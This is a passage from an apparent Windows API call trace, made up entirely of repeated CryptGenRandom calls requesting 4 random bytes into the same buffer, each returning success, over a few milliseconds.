CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 